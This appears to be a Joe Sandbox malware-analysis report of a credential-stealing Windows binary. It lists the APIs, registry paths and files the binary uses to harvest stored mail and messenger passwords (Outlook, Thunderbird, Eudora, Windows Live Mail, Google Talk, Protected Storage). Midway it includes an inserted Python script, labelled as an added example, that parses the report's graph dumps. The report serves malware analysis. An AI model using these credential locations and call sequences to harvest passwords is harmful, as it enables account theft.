437ffa 22 API calls 34251 4021ff 14 API calls 34252 43f5fc 149 API calls 34448 40e381 9 API calls 34254 405983 40 API calls 34255 42b186 27 API calls __fprintf_l 34256 427d86 76 API calls 34257 403585 20 API calls 34259 42e58e 18 API calls __fprintf_l 34262 425115 75 API calls __fprintf_l 34264 401592 8 API calls 33188 410b92 33191 410a6b 33188->33191 33190 410bb2 33192 410a77 33191->33192 33193 410a89 GetPrivateProfileIntA 33191->33193 33196 410983 memset _itoa WritePrivateProfileStringA 33192->33196 33193->33190 33195 410a84 33195->33190 33196->33195 34452 434395 16 API calls 34266 441d9c memcmp 34454 43f79b 119 API calls 34267 40c599 43 API calls 34455 426741 87 API calls 34271 4401a6 21 API calls 34273 426da6 memcpy memset memset memcpy 34274 4335a5 15 API calls 34276 4299ab memset memset memcpy memset memset 34277 40b1ab 8 API calls 34460 425115 76 API calls __fprintf_l 34464 4113b2 18 API calls 2 library calls 34468 40a3b8 memset sprintf SendMessageA 33221 410bbc 33224 4109cf 33221->33224 33225 4109dc 33224->33225 33226 410a23 memset GetPrivateProfileStringA 33225->33226 33227 4109ea memset 33225->33227 33232 407646 strlen 33226->33232 33237 4075cd sprintf memcpy 33227->33237 33230 410a0c WritePrivateProfileStringA 33231 410a65 33230->33231 33233 40765a 33232->33233 33235 40765c 33232->33235 33233->33231 33234 4076a3 33234->33231 33235->33234 33238 40737c strtoul 33235->33238 33237->33230 33238->33235 34279 40b5bf memset memset _mbsicmp

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
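The execution_graph dump above and the control_flow_graph line here are graph figures that the report serialises as a flat token stream, so the questions an analyst actually asks (which functions and APIs are reachable from the CRT entry point, which basic blocks form loops) are not answerable by reading the text. The following Python script is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it parses that token stream and computes reachability and loop (back) edges. The grammar it assumes is inferred from this report's dump and is not a documented format: a node is a decimal id followed by a 6-hex-digit address (execution graph) or a start-end block range (control-flow graph) and then its label words, and an edge is `id->id`. The embedded inputs are verbatim excerpts of the two graphs on this page (the CRT start-up chain leading into 40cf44, and the 4082cd basic blocks), trimmed for length.

```python
"""Parse the token-serialised execution_graph / control_flow_graph dumps of a
Joe Sandbox report and answer reachability and loop questions.
Added example; grammar (node = "<id> <addr|start-end> <label...>",
edge = "<id>-><id>") is inferred from this report's dump, not documented."""
import re
from collections import defaultdict, deque

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_ADDR = re.compile(r"^[0-9a-f]{6}(?:-[0-9a-f]{6})?$")
_NUM = re.compile(r"^\d+$")
_NOISE = {"API", "calls", "*"}  # label filler tokens, not API names

# Verbatim excerpts of this report's graphs (trimmed, not constructed).
EXEC_GRAPH_EXCERPT = (
    "execution_graph 34108 40fc40 70 API calls 33239 444c4a 33258 444e38 "
    "33239->33258 33241 444c56 GetModuleHandleA 33242 444c68 __set_app_type "
    "__p__fmode __p__commode 33241->33242 33244 444cfa 33242->33244 33245 444d02 "
    "__setusermatherr 33244->33245 33246 444d0e 33244->33246 33245->33246 33259 "
    "444e22 _controlfp 33246->33259 33248 444d13 _initterm __getmainargs _initterm "
    "33249 444d6a GetStartupInfoA 33248->33249 33251 444d9e GetModuleHandleA "
    "33249->33251 33260 40cf44 33251->33260 33255 444dcf _cexit 33257 444e04 "
    "33255->33257 33256 444dc8 exit 33256->33255 33258->33241 33259->33248 "
    "33311 404a99 LoadLibraryA 33260->33311 33312 404ac4 GetProcAddress 33311->33312"
)
CFG_EXCERPT = (
    "control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA "
    "MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c "
    "129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b "
    "131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 "
    "134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 "
    "138->133 138->134"
)


def parse_graph(text):
    """Return (nodes, edges): nodes maps id -> (addr, [label tokens]);
    edges maps id -> sorted successor ids (targets may lie outside the excerpt)."""
    toks = text.split()
    nodes, edges, cur, i = {}, defaultdict(list), None, 0
    while i < len(toks):
        m = _EDGE.match(toks[i])
        if m:
            edges[m.group(1)].append(m.group(2))
        elif _NUM.match(toks[i]) and i + 1 < len(toks) and _ADDR.match(toks[i + 1]):
            cur = toks[i]                      # new node: "<id> <addr>"
            nodes[cur] = (toks[i + 1], [])
            i += 1
        elif cur is not None:
            nodes[cur][1].append(toks[i])      # label word of the current node
        i += 1
    return nodes, {k: sorted(v) for k, v in edges.items()}


def entry_candidates(nodes, edges):
    """Addresses of nodes nothing in the dump calls: real entry points or
    disconnected stubs such as the pruned 'N API calls' nodes."""
    targets = {t for succ in edges.values() for t in succ}
    return sorted(a for i, (a, _) in nodes.items() if i not in targets)


def reachable(nodes, edges, start_addr):
    """Addresses reachable (BFS) from every node sitting at start_addr."""
    queue = deque(i for i, (a, _) in nodes.items() if a == start_addr)
    if not queue:
        raise KeyError(f"no node at {start_addr}")
    seen = set(queue)
    while queue:
        for s in edges.get(queue.popleft(), []):
            if s not in seen:
                seen.add(s)
                queue.append(s)
    return {nodes[i][0] for i in seen if i in nodes}


def reachable_apis(nodes, edges, start_addr):
    """API / CRT names on the labels of nodes reachable from start_addr."""
    addrs = reachable(nodes, edges, start_addr)
    return {t for a, label in nodes.values() if a in addrs
            for t in label if t not in _NOISE and not _NUM.match(t)}


def back_edges(nodes, edges, root_addr):
    """Edges that return to a node still on the DFS path from root_addr,
    i.e. loops, as (src_addr, dst_addr) pairs. Iterative three-colour DFS."""
    WHITE, GREY, BLACK = 0, 1, 2
    colour, loops = defaultdict(int), set()
    for root in (i for i, (a, _) in nodes.items() if a == root_addr):
        if colour[root] != WHITE:
            continue
        colour[root] = GREY
        stack = [(root, iter(edges.get(root, [])))]
        while stack:
            n, succ = stack[-1]
            for s in succ:
                if colour[s] == GREY:          # ancestor on the path: a loop
                    loops.add((nodes.get(n, (n, []))[0], nodes.get(s, (s, []))[0]))
                elif colour[s] == WHITE:
                    colour[s] = GREY
                    stack.append((s, iter(edges.get(s, []))))
                    break
            else:
                colour[n] = BLACK
                stack.pop()
    return loops


if __name__ == "__main__":
    n, e = parse_graph(EXEC_GRAPH_EXCERPT)
    print("entry candidates:", entry_candidates(n, e))
    print("APIs reachable from 444c4a:", sorted(reachable_apis(n, e, "444c4a")))
    c, ce = parse_graph(CFG_EXCERPT)
    print("loops inside 4082cd:", sorted(back_edges(c, ce, "4082cd-40841a")))
```

Running it on the full execution_graph text (paste the whole dump into `EXEC_GRAPH_EXCERPT`) gives the set of Win32 and CRT calls actually on a path from the CRT entry `444c4a`, which is the list worth comparing against the report's behaviour signatures; on the 4082cd control-flow graph it isolates the two copy loops (`408422-40842b` with `408432-40844e`, and `408455-40845e` with `408465-408482`) that follow the `GetComputerNameA`/`GetUserNameA` calls, the blocks a reverser would open first to see how the gathered host and user names are transformed.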
                                          APIs
                                          • memset.MSVCRT ref: 0040832F
                                          • memset.MSVCRT ref: 00408343
                                          • memset.MSVCRT ref: 0040835F
                                          • memset.MSVCRT ref: 00408376
                                          • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                          • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                          • strlen.MSVCRT ref: 004083E9
                                          • strlen.MSVCRT ref: 004083F8
                                          • memcpy.MSVCRT ref: 0040840A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$ByteCharMulusermeWidestrlen$ComputerUsermemcpy
                                          • String ID: 5$H$O$b$i$}$}
                                          • API String ID: 1832431107-3760989150

                                          Control-flow Graph

                                          APIs
                                          • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                          • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                          • strlen.MSVCRT ref: 00407F5C
                                          • strlen.MSVCRT ref: 00407F64
                                          Strings
                                          Similarity
                                          • API ID: FileFindstrlen$FirstNext
                                          • String ID: ACD
                                          • API String ID: 379999529-620537770

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 00401E8B
                                          • strlen.MSVCRT ref: 00401EA4
                                          • strlen.MSVCRT ref: 00401EB2
                                          • strlen.MSVCRT ref: 00401EF8
                                          • strlen.MSVCRT ref: 00401F06
                                          • memset.MSVCRT ref: 00401FB1
                                          • atoi.MSVCRT ref: 00401FE0
                                          • memset.MSVCRT ref: 00402003
                                          • sprintf.MSVCRT ref: 00402030
                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                          • memset.MSVCRT ref: 00402086
                                          • memset.MSVCRT ref: 0040209B
                                          • strlen.MSVCRT ref: 004020A1
                                          • strlen.MSVCRT ref: 004020AF
                                          • strlen.MSVCRT ref: 004020E2
                                          • strlen.MSVCRT ref: 004020F0
                                          • memset.MSVCRT ref: 00402018
                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                          • _mbscpy.MSVCRT ref: 00402177
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                          Strings
                                          Similarity
                                          • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                          • API String ID: 1846531875-4223776976

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                            • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                            • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                            • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                          • DeleteObject.GDI32(?), ref: 0040D1A6
                                          Strings
                                          Similarity
                                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$`7<u
                                          • API String ID: 745651260-3672999695

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                          • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                          • _mbscpy.MSVCRT ref: 00403E54
                                          Strings
                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                          • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                          • PStoreCreateInstance, xrefs: 00403C44
                                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                          • pstorec.dll, xrefs: 00403C30
                                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc_mbscpy
                                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                          • API String ID: 1197458902-317895162

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                          • String ID: kv
                                          • API String ID: 3662548030-155876773

                                          Control-flow Graph

                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                          • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                          • memcpy.MSVCRT ref: 0040FBE4
                                          • memcpy.MSVCRT ref: 0040FBF9
                                            • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                            • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                            • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                            • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                          • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                          Strings
                                          Similarity
                                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                          • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                          • API String ID: 2768085393-2409096184

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 0044430B
                                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                            • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                            • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                            • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                            • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                          • memset.MSVCRT ref: 00444379
                                          • memset.MSVCRT ref: 00444394
                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                          • strlen.MSVCRT ref: 004443DB
                                          • _strcmpi.MSVCRT ref: 00444401
                                          Strings
                                          • \Microsoft\Windows Live Mail, xrefs: 00444350
                                          • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                          • \Microsoft\Windows Mail, xrefs: 00444329
                                          • Store Root, xrefs: 004443A5
                                          Similarity
                                          • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                          • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                          • API String ID: 832325562-2578778931

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 0040F567
                                          • memset.MSVCRT ref: 0040F57F
                                            • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                          • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                          • memcpy.MSVCRT ref: 0040F652
                                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                          Strings
                                          Similarity
                                          • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                          • String ID:
                                          • API String ID: 2012582556-3916222277

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 004037EB
                                          • memset.MSVCRT ref: 004037FF
                                            • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                            • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                          • strchr.MSVCRT ref: 0040386E
                                          • _mbscpy.MSVCRT ref: 0040388B
                                          • strlen.MSVCRT ref: 00403897
                                          • sprintf.MSVCRT ref: 004038B7
                                          • _mbscpy.MSVCRT ref: 004038CD
                                          Strings
                                          Similarity
                                          • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                          • String ID: %s@yahoo.com
                                          • API String ID: 317221925-3288273942

                                          Control-flow Graph

                                          APIs
                                          • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                          • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                          • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                          Strings
                                          Similarity
                                          • API ID: Library$AddressFreeLoadMessageProc
                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                          • API String ID: 2780580303-317687271

                                          Control-flow Graph

                                          control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                          APIs
                                          • memset.MSVCRT ref: 00403504
                                          • memset.MSVCRT ref: 0040351A
                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                          • _mbscpy.MSVCRT ref: 00403555
                                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                          • _mbscat.MSVCRT ref: 0040356D
                                          Similarity
                                          • API ID: _mbscatmemset$Close_mbscpystrlen
                                          • String ID: InstallPath$Software\Group Mail$fb.dat
                                          • API String ID: 3071782539-966475738

                                          Control-flow Graph

                                          control_flow_graph 374 40ccd7-40cd06 ??2@YAPAXI@Z 375 40cd08-40cd0d 374->375 376 40cd0f 374->376 377 40cd11-40cd24 ??2@YAPAXI@Z 375->377 376->377 378 40cd26-40cd2d call 404025 377->378 379 40cd2f 377->379 381 40cd31-40cd57 378->381 379->381 382 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 381->382 383 40cd59-40cd60 DeleteObject 381->383 383->382
                                          Similarity
                                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                          • String ID:
                                          • API String ID: 2054149589-0

                                          APIs
                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                            • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                            • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                          • memset.MSVCRT ref: 00408620
                                            • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                          • memset.MSVCRT ref: 00408671
                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                          • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                          Strings
                                          • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                          Similarity
                                          • API ID: memset$ByteCharCloseMulusermeWidestrlen$ComputerEnumOpenUser
                                          • String ID: Software\Google\Google Talk\Accounts
                                          • API String ID: 1366857005-1079885057

                                          Control-flow Graph

                                          control_flow_graph 414 40ba28-40ba3a 415 40ba87-40ba9b call 406c62 414->415 416 40ba3c-40ba52 call 407e20 _mbsicmp 414->416 438 40ba9d call 4107f1 415->438 439 40ba9d call 404734 415->439 440 40ba9d call 404785 415->440 441 40ba9d call 403c16 415->441 442 40ba9d call 410a9c 415->442 421 40ba54-40ba6d call 407e20 416->421 422 40ba7b-40ba85 416->422 428 40ba74 421->428 429 40ba6f-40ba72 421->429 422->415 422->416 423 40baa0-40bab3 call 407e30 430 40bab5-40bac1 423->430 431 40bafa-40bb09 SetCursor 423->431 432 40ba75-40ba76 call 40b5e5 428->432 429->432 433 40bac3-40bace 430->433 434 40bad8-40baf7 qsort 430->434 432->422 433->434 434->431 438->423 439->423 440->423 441->423 442->423
                                          Similarity
                                          • API ID: Cursor_mbsicmpqsort
                                          • String ID: /nosort$/sort
                                          • API String ID: 882979914-1578091866
                                          APIs
                                            • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                            • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                          • memset.MSVCRT ref: 00410E10
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                          • _mbscpy.MSVCRT ref: 00410E87
                                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                          Similarity
                                          • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                          • API String ID: 889583718-2036018995
                                          APIs
                                          • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                          • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                          • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                          • LockResource.KERNEL32(00000000), ref: 00410CA1
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID:
                                          • API String ID: 3473537107-0
                                          APIs
                                          • memset.MSVCRT ref: 004109F7
                                            • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                            • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                          • memset.MSVCRT ref: 00410A32
                                          • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                          Similarity
                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                          • String ID:
                                          • API String ID: 3143880245-0
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          Similarity
                                          • API ID: ??3@mallocmemcpy
                                          • String ID:
                                          • API String ID: 3831604043-0
                                          APIs
                                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                          • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                          Similarity
                                          • API ID: CreateFontIndirect_mbscpymemset
                                          • String ID: Arial
                                          • API String ID: 3853255127-493054409
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          APIs
                                            • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                          • _strcmpi.MSVCRT ref: 0040CEC3
                                          Similarity
                                          • API ID: strlen$_strcmpimemset
                                          • String ID: /stext
                                          • API String ID: 520177685-3817206916
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          APIs
                                            • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                          • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc
                                          • String ID:
                                          • API String ID: 145871493-0
                                          APIs
                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                            • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                            • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                            • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                          Similarity
                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                          • String ID:
                                          • API String ID: 4165544737-0
                                          APIs
                                          • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          APIs
                                          • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          APIs
                                          • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          APIs
                                          • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                          Similarity
                                          • API ID: EnumNamesResource
                                          • String ID:
                                          • API String ID: 3334572018-0
                                          APIs
                                          • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          APIs
                                          • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
